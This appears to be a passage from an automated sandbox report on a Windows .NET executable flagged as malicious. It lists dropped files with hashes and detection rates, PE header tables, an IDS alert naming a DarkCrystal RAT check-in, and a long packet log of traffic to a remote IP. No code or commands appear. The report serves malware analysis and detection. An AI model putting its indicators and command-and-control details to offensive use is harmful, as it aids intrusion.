                                                          Entropy (8bit):5.8769270258874755
                                                          Encrypted:false
                                                          SSDEEP:1536:p7Oc/sAwP1Q1wUww6vtZNthMx4SJ2ZgjlrL7BzZZmKYT:lOc/sAwP1Q1wUwhHBMx4a2iJjBzZZm9
                                                          MD5:E9CE850DB4350471A62CC24ACB83E859
                                                          SHA1:55CDF06C2CE88BBD94ACDE82F3FEA0D368E7DDC6
                                                          SHA-256:7C95D3B38114E7E4126CB63AADAF80085ED5461AB0868D2365DD6A18C946EA3A
                                                          SHA-512:9F4CBCE086D8A32FDCAEF333C4AE522074E3DF360354822AA537A434EB43FF7D79B5AF91E12FB62D57974B9ED5B4D201DDE2C22848070D920C9B7F5AE909E2CA
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 71%
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):33280
                                                          Entropy (8bit):5.634433516692816
                                                          Encrypted:false
                                                          SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                          MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                          SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                          SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                          SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 12%
                                                          Process:C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):46592
                                                          Entropy (8bit):5.870612048031897
                                                          Encrypted:false
                                                          SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                          MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                          SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                          SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                          SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 5%
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):33792
                                                          Entropy (8bit):5.541771649974822
                                                          Encrypted:false
                                                          SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                          MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                          SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                          SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                          SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 29%
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:ASCII text, with very long lines (744), with no line terminators
                                                          Category:dropped
                                                          Size (bytes):744
                                                          Entropy (8bit):5.893315213761689
                                                          Encrypted:false
                                                          SSDEEP:12:V0WPMDLoYXMdbamihkfpbSdPeGNo8ai24WbKuUyivYH/ZsRhQwivpy:V0WPMDjWaMQeGN0pee/GzQhy
                                                          MD5:B0A7973D324F38441BF47C66F4A939E1
                                                          SHA1:E9B25EF779F22429B9D90BA0DB530EF2419E1068
                                                          SHA-256:2F51C249B5DC05B879AC9102AB9C1535F0C3EE319D51BDF70D50BA3C0D7687C4
                                                          SHA-512:A9CF28495940D37D1EC5B36A209F1D4C3EF095EFEAEE60BD1B310620A8A2A1DD19C21AEF531196CBDA8DB7E7CABAC40F40D5C8FD48591CCFD475BA47CEB921BC
                                                          Malicious:false
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):16272384
                                                          Entropy (8bit):2.4574169294943817
                                                          Encrypted:false
                                                          SSDEEP:49152:cf9n4cwMfZuNsd9GCdIL6u199WXmQzA8Gqgfe4Nx7eODbUZIYqXNkp9IW8h:cf54mfdQCQx19xQzJScObKp9M
                                                          MD5:8213A9C837181823A4D58728637EAEB5
                                                          SHA1:F574EEC251D1695589C1E0E00AE167DFB39216EC
                                                          SHA-256:68129B517BC27AE2AD742008A7DEB67CC9C85209665F73C8FEA955C52F1EF33E
                                                          SHA-512:4B642F9D9B0F86CB83D2B7371BAF00AFEC1A1475BE85CCFAE08794CB6978B6BE2999BCAF6195351BCD446956F7639F71999FF182F932E3A0D66D935C5E832DAC
                                                          Malicious:true
                                                          Antivirus:
                                                          • Antivirus: ReversingLabs, Detection: 66%
                                                          Process:C:\Users\user\Desktop\9XHFe6y4Dj.exe
                                                          File Type:ASCII text, with CRLF line terminators
                                                          Category:dropped
                                                          Size (bytes):26
                                                          Entropy (8bit):3.95006375643621
                                                          Encrypted:false
                                                          SSDEEP:3:ggPYV:rPYV
                                                          MD5:187F488E27DB4AF347237FE461A079AD
                                                          SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                          SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                          SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                          Malicious:true
                                                          Preview:[ZoneTransfer]....ZoneId=0
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:MSVC .res
                                                          Category:dropped
                                                          Size (bytes):1224
                                                          Entropy (8bit):4.435108676655666
                                                          Encrypted:false
                                                          SSDEEP:24:OBxOysuZhN7jSjRzPNnqNdt4+lEbNFjMyi07:COulajfqTSfbNtme
                                                          MD5:931E1E72E561761F8A74F57989D1EA0A
                                                          SHA1:B66268B9D02EC855EB91A5018C43049B4458AB16
                                                          SHA-256:093A39E3AB8A9732806E0DA9133B14BF5C5B9C7403C3169ABDAD7CECFF341A53
                                                          SHA-512:1D05A9BB5FA990F83BE88361D0CAC286AC8B1A2A010DB2D3C5812FB507663F7C09AE4CADE772502011883A549F5B4E18B20ACF3FE5462901B40ABCC248C98770
                                                          Malicious:false
                                                          Preview:.... ...........................|...<...............0...........|.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...T.....I.n.t.e.r.n.a.l.N.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...\.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...S.e.c.u.r.i.t.y.H.e.a.l.t.h.S.y.s.t.r.a.y...e.x.e...4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0....................................<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<assembly xmlns="urn:schemas-microsoft-com:asm.v1" manifestVersion="1.0">.. <assemblyIdentity version="1.0.0.0" name="MyApplication.app"/>.. <trustInfo xmlns="urn:schemas-microsoft-com:asm.v2">.. <securi
                                                          Process:C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
                                                          File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Category:dropped
                                                          Size (bytes):4608
                                                          Entropy (8bit):3.9777303084630145
                                                          Encrypted:false
                                                          SSDEEP:48:6LJPPt2M7Jt8Bs3FJsdcV4MKe27XdEoXvqBHCOulajfqXSfbNtm:+PlPc+Vx9MRXvkscjRzNt
                                                          MD5:28BBB28888F378FF7BF8C3828DDBC481
                                                          SHA1:B7938439325E26DADF5157297CDF2411945F3538
                                                          SHA-256:4E9E37F58D87DC4E0CDEE912704B6569B85238E210D0BA4AE443060E0714C462
                                                          SHA-512:EDB7418E48450AFCAF87CC4C98702A2296C483005BD2D97F13B6B8B9BAC95D05C5B5A69F1261DACEFAD230AB74600B8262D1B57B49141299136FF751A5632FE5
                                                          Malicious:true
                                                          Process:C:\Windows\System32\w32tm.exe
                                                          File Type:ASCII text
                                                          Category:dropped
                                                          Size (bytes):151
                                                          Entropy (8bit):4.862853408628296
                                                          Encrypted:false
                                                          SSDEEP:3:VLV993J+miJWEoJ8FXPgjeQwYEQuXKvo5udX6vj:Vx993DEUoawYtSW8
                                                          MD5:976E574EE5FFF00C28C5AC670275D132
                                                          SHA1:0DE7CE5BE2660744C275C2923AA08810984586F8
                                                          SHA-256:FE867C17F4C9340B54F92D7AF9272C435185F54C1BF9EE933C1C436C085A8147
                                                          SHA-512:CFA534954D249DB1021343532A517754A85F5D0EE5A492751F652C3625E5DA75FFCCA12578A68E0BEF55D51C3E70533B9E68DA697C6A9C913D84FC719BF67E4F
                                                          Malicious:false
                                                          Preview:Tracking localhost [[::1]:123]..Collecting 2 samples..The current time is 20/10/2024 13:18:58..13:18:58, error: 0x80072746.13:19:03, error: 0x80072746.
                                                          File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                          Entropy (8bit):2.4574169294943817
                                                          TrID:
                                                          • Win32 Executable (generic) Net Framework (10011505/4) 49.80%
                                                          • Win32 Executable (generic) a (10002005/4) 49.75%
                                                          • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                          • Windows Screen Saver (13104/52) 0.07%
                                                          • Generic Win/DOS Executable (2004/3) 0.01%
                                                          File name:9XHFe6y4Dj.exe
                                                          File size:16'272'384 bytes
                                                          MD5:8213a9c837181823a4d58728637eaeb5
                                                          SHA1:f574eec251d1695589c1e0e00ae167dfb39216ec
                                                          SHA256:68129b517bc27ae2ad742008a7deb67cc9c85209665f73c8fea955c52f1ef33e
                                                          SHA512:4b642f9d9b0f86cb83d2b7371baf00afec1a1475be85ccfae08794cb6978b6be2999bcaf6195351bcd446956f7639f71999ff182f932e3a0d66d935c5e832dac
                                                          SSDEEP:49152:cf9n4cwMfZuNsd9GCdIL6u199WXmQzA8Gqgfe4Nx7eODbUZIYqXNkp9IW8h:cf54mfdQCQx19xQzJScObKp9M
                                                          TLSH:89F6F11AB5924F32D3B45B319567013E8290CB613262EB2F361F24C368677F19A779E3
                                                          Icon Hash:00928e8e8686b000
                                                          Entrypoint:0x78936e
                                                          Entrypoint Section:.text
                                                          Digitally signed:false
                                                          Imagebase:0x400000
                                                          Subsystem:windows gui
                                                          Image File Characteristics:EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                          Time Stamp:0x670CF099 [Mon Oct 14 10:21:13 2024 UTC]
                                                          TLS Callbacks:
                                                          CLR (.Net) Version:v4.0.30319
                                                          OS Version Major:4
                                                          OS Version Minor:0
                                                          File Version Major:4
                                                          File Version Minor:0
                                                          Subsystem Version Major:4
                                                          Subsystem Version Minor:0
                                                          Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
                                                          Instruction
                                                          jmp dword ptr [00402000h]
                                                          add byte ptr [eax], al
                                                          Name | Virtual Address | Virtual Size | Is in Section
                                                          IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_IMPORT | 0x389320 | 0x4b | .text
                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x38a000 | 0x320 | .rsrc
                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x38c000 | 0xc | .reloc
                                                          IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
                                                          IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                                          Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                                          .text | 0x2000 | 0x387374 | 0x387400 | cabff5e50568872017e4754380ead009 | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                          .rsrc | 0x38a000 | 0x320 | 0x400 | d5d56b53a3d8bd8ef3235020baab9fae | False | 0.353515625 | data | 2.6517752881589467 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                          .reloc | 0x38c000 | 0xc | 0x200 | 87beb7d42148ad16a8f15f0d74096e16 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                          Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                                          RT_VERSION | 0x38a058 | 0x2c8 | data | | | 0.46207865168539325
                                                          DLL | Import
                                                          mscoree.dll | _CorExeMain
                                                          Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
                                                          2024-10-20T18:17:54.870250+0200 | 2048095 | ET MALWARE [ANY.RUN] DarkCrystal Rat Check-in (POST) | 1 | 192.168.2.5 | 49772 | 188.114.96.3 | 80 | TCP
                                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                          Oct 20, 2024 18:17:56.766159058 CEST8049782188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:56.766170979 CEST8049782188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:56.766182899 CEST8049782188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:56.797019958 CEST8049772188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:56.908417940 CEST4977280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:57.174182892 CEST4977280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:57.175852060 CEST4978480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:57.179810047 CEST8049772188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:57.179987907 CEST4977280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:57.180866957 CEST8049784188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:57.180953979 CEST4978480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:57.181180000 CEST4978480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:57.186233997 CEST8049784188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:57.217400074 CEST8049782188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:57.354612112 CEST4978280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:57.527158976 CEST4978480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:57.532215118 CEST8049784188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:57.533436060 CEST8049784188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:57.586172104 CEST8049782188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:57.667115927 CEST4978280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:57.756182909 CEST4978280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:57.757075071 CEST4978980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:57.761414051 CEST8049782188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:57.761466980 CEST4978280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:57.762006998 CEST8049789188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:57.762065887 CEST4978980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:57.762398958 CEST4978980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:57.767174959 CEST8049789188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:57.956057072 CEST8049784188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:58.120415926 CEST4978980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:58.125926018 CEST8049789188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:58.125937939 CEST8049789188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:58.125946045 CEST8049789188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:58.167123079 CEST4978480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:58.169543028 CEST8049784188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:58.169701099 CEST4978480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:58.321239948 CEST8049784188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:58.463969946 CEST4978480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:58.547938108 CEST8049789188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:58.667720079 CEST4978980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:17:58.956697941 CEST8049789188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:17:59.167071104 CEST4978980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.147286892 CEST4978480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.147411108 CEST4978980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.148114920 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.152780056 CEST8049784188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.153321981 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.153357029 CEST4978480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.153446913 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.153618097 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.154350996 CEST8049789188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.154689074 CEST4978980192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.161298990 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.175050020 CEST4980380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.179837942 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.180314064 CEST4980380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.180314064 CEST4980380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.185210943 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.511051893 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.515919924 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.515930891 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.515950918 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.515959024 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.515966892 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.516000032 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.516007900 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.516036034 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.516105890 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.516114950 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.516143084 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.516144037 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.516293049 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.516318083 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.516625881 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.521069050 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.521079063 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.521086931 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.521095037 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.521105051 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.521114111 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.521145105 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.521219969 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.521830082 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.521989107 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.526529074 CEST4980380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.531411886 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.531431913 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.531440973 CEST8049803188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.573559046 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.573721886 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.621557951 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.621686935 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.669600964 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.669687033 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.719089985 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.719239950 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.769481897 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.769746065 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.787657022 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.787854910 CEST4980280192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.792948961 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.792959929 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793132067 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793142080 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793148994 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793158054 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793174982 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793184996 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793219090 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793229103 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793287039 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793344975 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793406010 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793415070 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793425083 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793451071 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793512106 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793520927 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793529987 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793565989 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793613911 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793622971 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793680906 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793690920 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793745995 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793755054 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793831110 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793839931 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793869019 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793915033 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793981075 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.793991089 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794044018 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794059992 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794078112 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794086933 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794169903 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794249058 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794296026 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794305086 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794368982 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794378042 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794439077 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794447899 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794488907 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794497967 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794547081 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794559002 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794627905 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794637918 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794728041 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.794738054 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.848901987 CEST4980580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.853883982 CEST8049805188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.853990078 CEST4980580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.854279995 CEST4980580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:18:00.859210968 CEST8049805188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:00.954628944 CEST8049802188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:18:01.167045116 CEST4980280192.168.2.5188.114.96.3
